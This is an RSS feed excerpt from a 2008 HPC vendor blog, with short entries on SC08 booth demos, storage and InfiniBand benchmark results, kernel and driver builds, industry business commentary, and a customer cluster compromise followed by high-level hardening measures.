      <description>We have spoken to a whole bunch of people about mpiHMMer and the incredible work JP has done on it. For those who don&amp;rsquo;t know, mpiHMMer is an MPI implementation of the HMMer code base. JP is working on getting it into the nVidia booth/machines, and will run a few demos tomorrow for people. [Let me know if you would like to see it](mailto:joe@scalability.org?subject=mpiHMMer demo). If you are not sure why it is interesting, consider that it has a multiple GPU version that JP benchmarked at more than 100x performance gain.</description>
    </item>
    
    <item>
      <title>SC08:  Day 1, Pervasive Software&#39;s Mike Hoskins talks about DataRush</title>
      <link>https://blog.scalability.org/2008/11/sc08-day-1-pervasive-softwares-mike-hoskins-talks-about-datarush/</link>
      <pubDate>Wed, 19 Nov 2008 04:47:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/sc08-day-1-pervasive-softwares-mike-hoskins-talks-about-datarush/</guid>
      <description></description>
    </item>
    
    <item>
      <title>SC08: Day 0 - Missed the Beowulf Bash</title>
      <link>https://blog.scalability.org/2008/11/sc08-day-0-missed-the-beowulf-bash/</link>
      <pubDate>Tue, 18 Nov 2008 03:59:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/sc08-day-0-missed-the-beowulf-bash/</guid>
      <description>This wasn&amp;rsquo;t on purpose. We got there a little late, saw a line outside the door &amp;hellip; which didn&amp;rsquo;t move &amp;hellip; :(</description>
    </item>
    
    <item>
      <title>SC08: Day 0 part 3</title>
      <link>https://blog.scalability.org/2008/11/sc08-day-0-part-3/</link>
      <pubDate>Mon, 17 Nov 2008 22:27:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/sc08-day-0-part-3/</guid>
      <description>This show is for the birds &amp;hellip;. the pidgeons that is &amp;hellip; the ones wandering near the booth. I hope that &amp;hellip; er &amp;hellip; ah &amp;hellip; nothing gets into the machines &amp;hellip; Not exactly bugs, but it is possible that someone could tell you that your machine is full of pidgeon droppings &amp;hellip; and mean it in a literal sense.</description>
    </item>
    
    <item>
      <title>SC08: Day 0 part 2</title>
      <link>https://blog.scalability.org/2008/11/sc08-day-0-part-2/</link>
      <pubDate>Mon, 17 Nov 2008 21:38:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/sc08-day-0-part-2/</guid>
      <description>Ok, we have the machines set up in the Pervasive Software booth, #203. Had a power hiccup (e.g. Joe knocked the power out while moving the rack) so we used this as an excuse to reconfigure the RAID to its RAID10 state. There really was no advantage to the RAID0 version, and the risk of problems was higher. RAID should be resynched in another 53 minutes. We have a single 10 GbE handling all the traffic &amp;hellip; looks like Windows didn&amp;rsquo;t like sending traffic simultaneously on both links.</description>
    </item>
    
    <item>
      <title>SC08: Day 0 ... monday morning ...</title>
      <link>https://blog.scalability.org/2008/11/sc08-day-0-monday-morning/</link>
      <pubDate>Mon, 17 Nov 2008 16:52:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/sc08-day-0-monday-morning/</guid>
      <description>Here we are, sitting in that most important spot, by the coffee, waiting for our cohorts and colleagues &amp;hellip; Austin is a nice place&amp;hellip; the SC08 map is kinda &amp;hellip; I dunno &amp;hellip; a little small-ish? Some of us [old : Dougs suggestion, talking about me] folks can&amp;rsquo;t quite read it &amp;hellip;</description>
    </item>
    
    <item>
      <title>SC08: Come see ΔV3 in Pervasive Software&#39;s booth</title>
      <link>https://blog.scalability.org/2008/11/sc08-come-see-v3-in-pervasive-softwares-booth/</link>
      <pubDate>Sun, 16 Nov 2008 05:08:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/sc08-come-see-v3-in-pervasive-softwares-booth/</guid>
      <description>Make sure you look at their data mining demo. DataRush (as indicated in the previous post) is a cool technology, and we are happy to be helping out. Pervasive Software has a vision for data intensive HPC that aligns well with what we have been saying. Personal supercomputing has been something we have been talking about for about 8 years, since I developed CT-BLAST. That was a tool to completely hide the pain of dealing with clusters for running one application, NCBI BLAST.</description>
    </item>
    
    <item>
      <title>Another side of HPC: data intensive HPC</title>
      <link>https://blog.scalability.org/2008/11/another-side-of-hpc-data-intensive-hpc/</link>
      <pubDate>Sun, 16 Nov 2008 04:46:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/another-side-of-hpc-data-intensive-hpc/</guid>
      <description>We have called this other names in the past, but basically data intensive HPC is pretty much anything that involves streaming huge amounts of data past processing elements to effect the calculation or analysis at hand. This type of HPC is not usually typified by large linear algebra solvers, so things like HPCC and LINPACK are less meaningful characterizations for data intensive performance, as this often relies upon significant IO firepower, as well as many cores.</description>
    </item>
    
    <item>
      <title>The business side of HPC ...</title>
      <link>https://blog.scalability.org/2008/11/the-business-side-of-hpc/</link>
      <pubDate>Sat, 15 Nov 2008 18:10:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/the-business-side-of-hpc/</guid>
      <description>&amp;hellip; is like any other business, there are ups and downs. Companies in HPC, as core HPC companies, and those with HPC practices are not immune to state of economy as a whole. If spending drops precipitously, business needs to re-adjust, and re-align. It definitely hurts if you are one of those &amp;hellip; re-aligned.
I have been there, and done that. I have been &amp;ldquo;re-aligned&amp;rdquo; twice, during downturns. The most recent time has been during the last bubble in 2002.</description>
    </item>
    
    <item>
      <title>Looks like the updated security measures are holding ...</title>
      <link>https://blog.scalability.org/2008/11/looks-like-the-updated-security-measures-are-holding/</link>
      <pubDate>Thu, 13 Nov 2008 06:04:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/looks-like-the-updated-security-measures-are-holding/</guid>
      <description>Quite early in the process, but we see probes have dropped off. Some of this may be due to the IP level (draconian) restrictions. The outline of the new security measures are as follows:
 The user has to have a valid VPN certificate to ssh to the system. Users cannot share a certificate. This isn&amp;rsquo;t simply policy, it is enforced on a technological level. outgoing traffic is pretty much restricted to VPN, and set specific ports.</description>
    </item>
    
    <item>
      <title>More ΔV numbers: as a direct attached storage to a Windows 2008 x64 server</title>
      <link>https://blog.scalability.org/2008/11/more-v-numbers-as-a-direct-attached-storage-to-a-windows-2008-x64-server/</link>
      <pubDate>Wed, 12 Nov 2008 02:30:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/more-v-numbers-as-a-direct-attached-storage-to-a-windows-2008-x64-server/</guid>
      <description>This is over a single 10 GbE link, using a pair of Intel cards with the ixgbe driver, and a CX-4 cable. The ΔV is configured in one of our two basic modes, in this case, a RAID10 unit. It is exporting an about 3.5TB partition over iSCSI to the Windows 2008 x64 Server box. This is an Intel dual Woodcrest 2.66 GHz box with 4 GB RAM.
I wanted to see what the bandwidth limits are.</description>
    </item>
    
    <item>
      <title>Quick ΔV performance numbers for the box going to SC08</title>
      <link>https://blog.scalability.org/2008/11/quick-v-performance-numbers-for-the-box-going-to-sc08/</link>
      <pubDate>Tue, 11 Nov 2008 03:38:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/quick-v-performance-numbers-for-the-box-going-to-sc08/</guid>
      <description>I thought people might like to see this:
root@dV3:~# dd if=/dev/zero of=/big/big.file ... 2048+0 records in 2048+0 records out 34359738368 bytes (34 GB) copied, 97.0368 s, 354 MB/s root@dV3:~# dd if=/big/big.file of=/dev/null ... 2048+0 records in 2048+0 records out 34359738368 bytes (34 GB) copied, 57.4585 s, 598 MB/s  and some bonnie++
Version 1.03b ------Sequential Output------ --Sequential Input- --Random- -Per Chr- --Block-- -Rewrite- -Per Chr- --Block-- --Seeks-- Machine Size K/sec %CP K/sec %CP K/sec %CP K/sec %CP K/sec %CP /sec %CP dV3 16G 360487 53 162147 32 542351 45 610.</description>
    </item>
    
    <item>
      <title>Now we are talking peta-flops ... baby!</title>
      <link>https://blog.scalability.org/2008/11/now-we-are-talking-peta-flops-baby/</link>
      <pubDate>Mon, 10 Nov 2008 21:24:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/now-we-are-talking-peta-flops-baby/</guid>
      <description>A petaflop here, a petaflop there, and soon we are talking about real performance</description>
    </item>
    
    <item>
      <title>Partner updates coming soon ... and a product announcement as well ...</title>
      <link>https://blog.scalability.org/2008/11/partner-updates-coming-soon-and-a-product-announcement-as-well/</link>
      <pubDate>Sat, 08 Nov 2008 17:21:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/partner-updates-coming-soon-and-a-product-announcement-as-well/</guid>
      <description>Should have some exciting news around the day job and a partnership we are working on. Will be in time for the SC08 show. Also, we should have some product announced soon. Real soon. Very exciting stuff for us &amp;hellip; We have already sold one (as of yesterday, we have the PO), and I am hoping to have one or more sold by early next week.
Not &amp;ldquo;game changing&amp;rdquo; from a technological perspective as Henry Newman posited on a blog post recently, but from other perspectives, it very well could be.</description>
    </item>
    
    <item>
      <title>Looks like there are problems with Seagate&#39;s 1.5TB drive firmware</title>
      <link>https://blog.scalability.org/2008/11/looks-like-there-are-problems-with-seagates-15tb-drive-firmware/</link>
      <pubDate>Sat, 08 Nov 2008 16:24:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/looks-like-there-are-problems-with-seagates-15tb-drive-firmware/</guid>
      <description>We have customers interested in using these drives. So we are looking into getting some. I am seeing some awful reports on the fora about buggy firmware. The response from Seagate doesn&amp;rsquo;t appear to be good. First they say they don&amp;rsquo;t support Linux, then they say they don&amp;rsquo;t support RAID with these (despite small local RAIDs being on their list of best fit applications). Now they claim it is a Linux problem, and the folks on the kernel list &amp;hellip; um &amp;hellip; disagree.</description>
    </item>
    
    <item>
      <title>Ok, this isn&#39;t terrible ...</title>
      <link>https://blog.scalability.org/2008/11/ok-this-isnt-terrible/</link>
      <pubDate>Fri, 07 Nov 2008 14:23:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/ok-this-isnt-terrible/</guid>
      <description>NFS over RDMA between a pair of JackRabbit systems with a Mellanox Connect-X card and a direct cable. We are getting about 500 MB/s +/- some on reads, and about 300 MB/s +/- a bit on writes. Not great, but actually in line with what is observed here. See the NFS over RDMA plots near the middle. This is about 1/3 of the available disk bandwidth on reads, and a little less than a 1/3 on writes.</description>
    </item>
    
    <item>
      <title>some quick iperf numbers for Connect-X</title>
      <link>https://blog.scalability.org/2008/11/some-quick-iperf-numbers-for-connect-x/</link>
      <pubDate>Fri, 07 Nov 2008 05:03:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/some-quick-iperf-numbers-for-connect-x/</guid>
      <description>On this blog, we have done some testing of Connect-X using OFED 1.3.1. This is on Ubuntu 8.04, and not on RedHat. Yes, we have a mostly functional OFED 1.3.1 we distribute on JackRabbit (and soon ΔV) I wanted to see what sort of performance we could get out of a single port DDR connection between two units.
On the server, I ran iperf -s and on the client I ran iperf -c 10.</description>
    </item>
    
    <item>
      <title>Doing some testing on a pair of JackRabbits</title>
      <link>https://blog.scalability.org/2008/11/doing-some-testing-on-a-pair-of-jackrabbits/</link>
      <pubDate>Thu, 06 Nov 2008 03:35:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/doing-some-testing-on-a-pair-of-jackrabbits/</guid>
      <description>The Connect-X cards arrived this morning, so we are late in shipping the units to the customer. Ugh, but manageable. Most everything is ready, about to launch octobonnie on it for the burn. Octobonnie is an example of an extreme stress test. We stress [rent a car bulgariaJackRabbit](http://jackrabbit.scalableinformatics.com) hard during basic testing. As a result, we learned quite a bit about how this system comes up and performs. Startup is fine, though PCI-e busses and bioses what they are, every now and then PCI-e x8 cards negotiate at x1.</description>
    </item>
    
    <item>
      <title>Parse this! /dev/sda2  ... no really, I want you to parse this ... not interpolate it ...</title>
      <link>https://blog.scalability.org/2008/11/parse-this-devsda2-no-really-i-want-you-to-parse-this-not-interpolate-it/</link>
      <pubDate>Sat, 01 Nov 2008 05:03:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/parse-this-devsda2-no-really-i-want-you-to-parse-this-not-interpolate-it/</guid>
      <description>For some of the lower level tools we are developing for ΔV (and for JackRabbit), we need to parse device strings. That look like this &amp;ldquo;/dev/sda1&amp;rdquo;. We have been doing this for years with the Perl Getopt::Long module. Well, something interesting happened today. I need to dig into it, but it looks like a (bad) change to some of the standard Perl libraries installed on this machine (Ubuntu based with our kernel).</description>
    </item>
    
    <item>
      <title>Ever have something ...</title>
      <link>https://blog.scalability.org/2008/10/ever-have-something/</link>
      <pubDate>Fri, 31 Oct 2008 22:23:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/ever-have-something/</guid>
      <description>&amp;hellip; that you really really want to talk about &amp;hellip; but you can&amp;rsquo;t in any depth? &amp;hellip; but it would be an awesome story if you did &amp;hellip; &amp;hellip; but you can&amp;rsquo;t &amp;hellip;
Yeah, we have one of those now. And it is about JackRabbit. All I think I can say (and I am still picking my jaw up off the floor), is 50x.</description>
    </item>
    
    <item>
      <title>Agami has left the building</title>
      <link>https://blog.scalability.org/2008/10/agami-has-left-the-building/</link>
      <pubDate>Fri, 31 Oct 2008 11:48:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/agami-has-left-the-building/</guid>
      <description>I should have posted this back when it happened, but I seem to have let it slip. An article in the Merc has some information on Agami going bust. I had seen &amp;ldquo;Scalable Storage Systems&amp;rdquo; announce its existence, but hadn&amp;rsquo;t heard details. And for some strange reason, I never looked into why Agami wasn&amp;rsquo;t there anymore. In this economy, companies imploding is nothing we shouldn&amp;rsquo;t expect. If anything, this economy has largely decimated the myth that small companies are more likely to go under than large companies.</description>
    </item>
    
    <item>
      <title>quotes</title>
      <link>https://blog.scalability.org/2008/10/quotes/</link>
      <pubDate>Fri, 31 Oct 2008 05:05:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/quotes/</guid>
      <description>A bit OT, but I thought it would be fun to share.
Someone on linkedin asked this question in an entrepreneur list. What quotes inspire you the most? The first is a George Bernard Shaw quote:
This makes me think of entrepreneurs as &amp;ldquo;unreasonable men&amp;rdquo;. We try to get the world, or at least our chunk of it, to see the value in what we do. The second is a Robert Heinlein quote, from one of my favorite books:</description>
    </item>
    
    <item>
      <title>Financial updates in a dangerous economy</title>
      <link>https://blog.scalability.org/2008/10/financial-updates-in-a-dangerous-economy/</link>
      <pubDate>Tue, 28 Oct 2008 23:11:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/financial-updates-in-a-dangerous-economy/</guid>
      <description>John West at InsideHPC.com pointed to an article at Barron&amp;rsquo;s about SGI. Before I get into this, I want to note that I had wondered whether or not we would continue to see (massive) oscillations in the market, as it effectively dissipated valuation, or if it would start tending towards an asymptotic lower limit &amp;hellip; testing the bottom as it were. It seems that the forces that are driving the economy are continuing to drive valuation out of the market.</description>
    </item>
    
    <item>
      <title>2.6.27.4 &#43; nVidia .... I think it is working ...</title>
      <link>https://blog.scalability.org/2008/10/26274-nvidia-i-think-it-is-working/</link>
      <pubDate>Tue, 28 Oct 2008 04:56:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/26274-nvidia-i-think-it-is-working/</guid>
      <description>Only took this &amp;hellip; sh ~root/NVIDIA-Linux-x86_64-177.80-pkg2.run --kernel-output-path=/lib/modules/2.6.27.4/build/ -k 2.6.27.4 --no-runlevel-check --kernel-module-only --no-x-check and some tweaking of the installed kernel source (strange, it wasn&amp;rsquo;t &amp;lsquo;make prepare&amp;rsquo; ed already) [update] nope &amp;hellip; but I understand the cause. The build machine has a different compiler than the target machine. As a result, the compiler on the target machine generates subtly different kernel modules than that of the build machine. And they disagree on the version of struct_module.</description>
    </item>
    
    <item>
      <title>QDR switches are here, QDR switches are here!</title>
      <link>https://blog.scalability.org/2008/10/qdr-switches-are-here-qdr-switches-are-here/</link>
      <pubDate>Mon, 27 Oct 2008 13:16:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/qdr-switches-are-here-qdr-switches-are-here/</guid>
      <description>(channeling Steve Martin in &amp;ldquo;The Jerk&amp;rdquo; when talking about the new phonebooks &amp;hellip;) 40 Gb ports. $400/port or so. See InsideHPC.com for more. For any Voltaire folks reading this, feel free to fire over a loaner QDR switch and pair of cards. We would love to see if the pair of JackRabbits we are finishing up for a customer will in fact be able to saturate these links. The issue is usually that the buffer copies between the disk and network drivers is slow, so we see significant performance loss with SDR.</description>
    </item>
    
    <item>
      <title>The impact of the financial state upon HPC</title>
      <link>https://blog.scalability.org/2008/10/the-impact-of-the-financial-state-upon-hpc/</link>
      <pubDate>Sun, 26 Oct 2008 16:28:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/the-impact-of-the-financial-state-upon-hpc/</guid>
      <description>HPC in general has demonstrated time and again that it provides value in up and down markets. The real value of being able to get (even approximate) answers to &amp;ldquo;what-if&amp;rdquo; questions has not been accurately measured or accounted for. Moreover, much engineering and R&amp;amp;D; work depends critically upon simulation. I expect companies to be far more frugal with new acquisitions, and want to focus upon getting more value and work out of their existing systems.</description>
    </item>
    
    <item>
      <title>Because ... you know ... its like so totally a good idea ...</title>
      <link>https://blog.scalability.org/2008/10/because-you-know-its-like-so-totally-a-good-idea/</link>
      <pubDate>Sat, 25 Oct 2008 18:57:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/because-you-know-its-like-so-totally-a-good-idea/</guid>
      <description>not.
Posted this to the Rocks list as a result of the question asked:
and this is what I got back
Yeah. Good move folks. Real good. Noticed that it had been on for a few more posts as well. Ok. What I take home from this is the the administrators in that community want
 me to go away and stop writing nice articles about Rocks, and stop helping Rocks users to punish/censor me  Yeah.</description>
    </item>
    
    <item>
      <title>Personal supercomputing, as long as it&#39;s under $10k USD</title>
      <link>https://blog.scalability.org/2008/10/personal-supercomputing-as-long-as-its-under-10k-usd/</link>
      <pubDate>Sat, 25 Oct 2008 05:30:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/personal-supercomputing-as-long-as-its-under-10k-usd/</guid>
      <description>The John&amp;rsquo;s (West and Leidel) at InsideHPC.com did a nice study on personal supercomputing at the site. It is worth a read. In short, they found people would find such boxen useful. But they don&amp;rsquo;t want to spend more than $10k for them. This is interesting at many levels. Matches up very well with informal/anecdotal data we have from conversations with users.
We noticed that users wanted personal supers many years ago.</description>
    </item>
    
    <item>
      <title>moderated by the [insert cluster distribution list] admins</title>
      <link>https://blog.scalability.org/2008/10/moderated-by-the-insert-cluster-distribution-list-admins/</link>
      <pubDate>Thu, 23 Oct 2008 23:14:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/moderated-by-the-insert-cluster-distribution-list-admins/</guid>
      <description>Yes folks, thats right. Everything I now write for the [insert cluster distribution list] will be moderated, or more likely, simply discarded. I guess people don&amp;rsquo;t quite know how to treat their friends and supporters. I need to seriously rethink writing articles like this in the future. Go figure.</description>
    </item>
    
    <item>
      <title>Hardening security on your Rocks system(s)</title>
      <link>https://blog.scalability.org/2008/10/hardening-security-on-your-rocks-systems/</link>
      <pubDate>Thu, 23 Oct 2008 22:59:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/hardening-security-on-your-rocks-systems/</guid>
      <description>We now understand the attack vector. Turned out to be simple, and some of the things we have done have now closed that door. It was a pretty simple door, but still worth noting. BTW: some don&amp;rsquo;t like early disclosures of exploits. I have heard from ~6 people (off the Rocks list) since posting that they have seen similar attacks attempted. The entry point was via a shared user account. Once this account was compromised, our new friend from Romania started working.</description>
    </item>
    
    <item>
      <title>Rocks system under attack</title>
      <link>https://blog.scalability.org/2008/10/rocks-systems-under-attack/</link>
      <pubDate>Thu, 23 Oct 2008 17:30:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/rocks-systems-under-attack/</guid>
      <description>A customer has a Rocks cluster, and it was compromised yet again. We have tried hardening the system, but it appears that there is another vector, associated with key loggers and windows machines.
Sadly this customers problems are largely self inflicted, as they can&amp;rsquo;t seem to operate without running as root user. I could say more, but I am somewhat pissed off that some of our critical advice was ignored, and then we are the target of some anger for the fact that they ignored the advice and were hacked.</description>
    </item>
    
    <item>
      <title>status update</title>
      <link>https://blog.scalability.org/2008/10/status-update/</link>
      <pubDate>Thu, 23 Oct 2008 14:14:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/status-update/</guid>
      <description>One of our ISPs does indeed have an outage today. SLA? We don&amp;rsquo;t need no steen-keen SLA &amp;hellip; We have redundancy.</description>
    </item>
    
    <item>
      <title>Perfect storms</title>
      <link>https://blog.scalability.org/2008/10/perfect-storms/</link>
      <pubDate>Thu, 23 Oct 2008 14:10:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/perfect-storms/</guid>
      <description>The term Perfect Storm represents a coincidence (temporal or spatial near simultaneity) of events that cause a much larger effect than any one of the events normally would on its own. Perfect storms are in some ways, a superposition of events. Every now and then you get to see one in action. Like now.
I won&amp;rsquo;t describe current economic times, or what I think are the causative effects. Just what I observe.</description>
    </item>
    
    <item>
      <title>... and something took down one of our links ...</title>
      <link>https://blog.scalability.org/2008/10/and-something-took-down-one-of-our-links/</link>
      <pubDate>Thu, 23 Oct 2008 12:26:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/and-something-took-down-one-of-our-links/</guid>
      <description>(or how to fail without really trying) We have a redundant pair of links into our site. Long history of seeing outages take down even (supposedly) SLA covered systems. This is why when I hear of SLAs for these systems, I snort in finely honed derision. They don&amp;rsquo;t work in these scenarios, and arguing about it won&amp;rsquo;t make them work. Redundancy is your only option. Anyone arguing otherwise hasn&amp;rsquo;t had an SLA and a company refusing to honor it to deal with.</description>
    </item>
    
    <item>
      <title>Why I am blocking hotmail.com</title>
      <link>https://blog.scalability.org/2008/10/why-i-am-blocking-hotmailcom/</link>
      <pubDate>Thu, 23 Oct 2008 03:34:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/why-i-am-blocking-hotmailcom/</guid>
      <description>No protest against Microsoft which owns that service. Just the unfortunate fact that hotmail is apparently the conduit now for a DoS attack against us. No, its not working. But I am assuming that someone somewhere has managed to corrupt the inbound mail access at hotmail. Have discarded about 12000 mails in the last 12 hours. May start blocking hotmail at the firewall, not even let it traverse our network. Sad.</description>
    </item>
    
    <item>
      <title>to be a 2x4 or not to be a 2x4 that is the question</title>
      <link>https://blog.scalability.org/2008/10/to-be-a-2x4-or-not-to-be-a-2x4-that-is-the-question/</link>
      <pubDate>Tue, 21 Oct 2008 17:30:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/to-be-a-2x4-or-not-to-be-a-2x4-that-is-the-question/</guid>
      <description>what if you discovered that your efforts in trying to win business were in fact being used to lever some other group down, and the groups speaking to you were simply there to use you as a lever. Or a 2x4 (two by four: basically a large block of wood used for support in framing, or used for, in a proverbial sense, beating people and companies up ). Since you are not going to win, no matter what you do, should you even expend the effort?</description>
    </item>
    
    <item>
      <title>Fresh new 2.6.27.2 kernel ... now mix in the nVidia driver and ...  Do&#39;h!</title>
      <link>https://blog.scalability.org/2008/10/fresh-new-26272-kernel-now-mix-in-the-nvidia-driver-and-doh/</link>
      <pubDate>Sun, 19 Oct 2008 17:29:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/fresh-new-26272-kernel-now-mix-in-the-nvidia-driver-and-doh/</guid>
      <description>Just built it this morning, as I wanted to test out a few things tomorrow. So I loaded it on the build machine. So far so good. Everything works. A bit faster too. Hmmm&amp;hellip;. maybe it forgot to scale the processor speed down during idle? Will look later. Ok, this machine has an nVidia Quadro FX/1100. Nice graphics card. Pull down the latest nVidia drivers, build them, and &amp;hellip; nothing.</description>
    </item>
    
    <item>
      <title>IAMJOE (I-AM-JOE or I AM JOE)</title>
      <link>https://blog.scalability.org/2008/10/iamjoe/</link>
      <pubDate>Sat, 18 Oct 2008 21:23:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/iamjoe/</guid>
      <description>I eschew talking politics on this blog. I simply don&amp;rsquo;t think it is right to do so here. This is a comment on a current event, and simply skip it if you have no interest in such things.
I watched in fascination and abject horror as our media descended upon a plumber one state and maybe 100 miles south of me. Full story and background at a humorous site I occasionally read.</description>
    </item>
    
    <item>
      <title>Indeed a glutton for punishment ...</title>
      <link>https://blog.scalability.org/2008/10/indeed-a-glutton-for-punishment/</link>
      <pubDate>Sat, 18 Oct 2008 17:57:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/indeed-a-glutton-for-punishment/</guid>
      <description>OFED 1.4-beta1 on IA64 (actually this is Ubuntu 8.04 server on IA64) in the office. I need a machine to act as a source/sink for IB for some testing.
root@itanic:~# uname -a Linux itanic 2.6.24-19-mckinley #1 SMP Thu Aug 21 01:16:49 UTC 2008 ia64 GNU/Linux root@itanic:~# ifconfig ib1 ib1 Link encap:UNSPEC HWaddr 80-00-04-05-FE-80-00-00-00-00-00-00-00-00-00-00 inet addr:192.168.11.239 Bcast:192.168.11.255 Mask:255.255.255.0 inet6 addr: fe80::208:f104:396:3d36/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:2044 Metric:1 RX packets:10 errors:0 dropped:0 overruns:0 frame:0 TX packets:12 errors:0 dropped:10 overruns:0 carrier:0 collisions:0 txqueuelen:128 RX bytes:728 (728.</description>
    </item>
    
    <item>
      <title>Cargo cult HPC</title>
      <link>https://blog.scalability.org/2008/10/cargo-cult-hpc/</link>
      <pubDate>Sat, 18 Oct 2008 17:19:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/cargo-cult-hpc/</guid>
      <description>This is a short thread of thought, which was triggered by a casual browse through Wikipedia on another topic (for an article I swear I am writing, right now, as I er &amp;hellip; uh &amp;hellip; write this). Way back in graduate school, we all had read Feynman&amp;rsquo;s book. Call it required reading at the academy. Good things came out of this, as we (a few friends and I) reverse engineered his discussions of differentiation under the integral sign and suddenly got a real powerful tool available to us (which seems to have pissed off a few profs in classes with homework, but thats a story for another beer).</description>
    </item>
    
    <item>
      <title>going private?</title>
      <link>https://blog.scalability.org/2008/10/going-private/</link>
      <pubDate>Sat, 18 Oct 2008 15:57:54 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/going-private/</guid>
      <description>Short note on a story John linked to on InsideHPC.com Should HPC vendors go private is the question. Of the three vendors listed, two of them are HPC vendors, the third is a general vendor with a few HPC sales.
Ok, who are the HPC vendors? This is a good question. I won&amp;rsquo;t give an exhaustive list, but the usual suspects are on that, where they derive all or most of their revenue from HPC.</description>
    </item>
    
    <item>
      <title>We get blasted from (distro) partisans when we say this ...</title>
      <link>https://blog.scalability.org/2008/10/we-get-blasted-from-distro-partisans-when-we-say-this/</link>
      <pubDate>Sat, 18 Oct 2008 15:02:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/we-get-blasted-from-distro-partisans-when-we-say-this/</guid>
      <description>&amp;hellip; so it is better to point out that the distro people are saying it themselves:
This is from lwn.net. Not me. Don&amp;rsquo;t shoot the messenger.
The link to the thread in question contains far more explosive (for distro partisans) content. Without cherry picking this author, he does a very good and succinct job of describing what Fedora is and what it is not. To wit:
Introduction of 4k stacks. Blew up lots of drivers, file systems, and other assorted things.</description>
    </item>
    
    <item>
      <title>Twas the month before SC08 ...</title>
      <link>https://blog.scalability.org/2008/10/twas-the-month-before-sc08/</link>
      <pubDate>Fri, 17 Oct 2008 14:05:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/twas-the-month-before-sc08/</guid>
      <description>&amp;hellip; and all throughout thehigh performance computing solutions house, all the creatures were stirring, they were using their own mouse. The JackRabbits were purring, pushing GB/s of data around, and the ΔV&amp;rsquo;s being booted, being worked, tested to be sound. The workers were filling orders, building units, making sure none were dead, while visions of high performance file systems and data motion danced in their heads. (with apologies to Clement Clarke Moore or Henry Livingston)</description>
    </item>
    
    <item>
      <title>Cudos to Cray!</title>
      <link>https://blog.scalability.org/2008/10/cudos-to-cray/</link>
      <pubDate>Thu, 16 Oct 2008 22:40:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/cudos-to-cray/</guid>
      <description>Buying back debt is a good thing. Company must be doing well. They had some rocky years for a while, but their costs are now under control, their market focus sharp, and they make their own stuff. John at InsideHPC has the scoop. They are obviously exploring new market directions (their CX unit announced last month), and this is a good thing. Hopefully they will get some bumper stickers out soon with &amp;ldquo;my other computer is a Cray&amp;rdquo; for SC08.</description>
    </item>
    
    <item>
      <title>This was interesting ...</title>
      <link>https://blog.scalability.org/2008/10/this-was-interesting/</link>
      <pubDate>Thu, 16 Oct 2008 22:34:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/this-was-interesting/</guid>
      <description>We were asked for an &amp;ldquo;emergency&amp;rdquo; quote for a system for a grant. One of the components fit nicely into the ΔV paradigm, basically as a disk to disk backup of 2x the main storage size for this cluster. The 24TB ΔV came in under $15k. Made me happy. Could have done the 36 TB ΔV, and I did consider it. It would have been overkill for this task. And it would have cost much less than $20k.</description>
    </item>
    
    <item>
      <title>PINOs</title>
      <link>https://blog.scalability.org/2008/10/pinos/</link>
      <pubDate>Thu, 16 Oct 2008 01:38:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/pinos/</guid>
      <description>It&amp;rsquo;s been a year, so I feel I can talk a little bit about this. I won&amp;rsquo;t name names or provide details. More than a year ago, we had a PINO. I didn&amp;rsquo;t detect it early enough, but have learned since what the signs are. A PINO is a &amp;ldquo;Partner In Name Only&amp;rdquo;. A PINO is a &amp;ldquo;partner&amp;rdquo; (notice the scare quotes). This &amp;ldquo;partner&amp;rdquo; wanted to work with us to help grow their cluster business.</description>
    </item>
    
    <item>
      <title>Nominations for readers choice &#34;best of HPC&#34; awards ...</title>
      <link>https://blog.scalability.org/2008/10/nominations-for-readers-choice-best-of-hpc-awards/</link>
      <pubDate>Wed, 15 Oct 2008 15:46:40 +0000</pubDate>
      
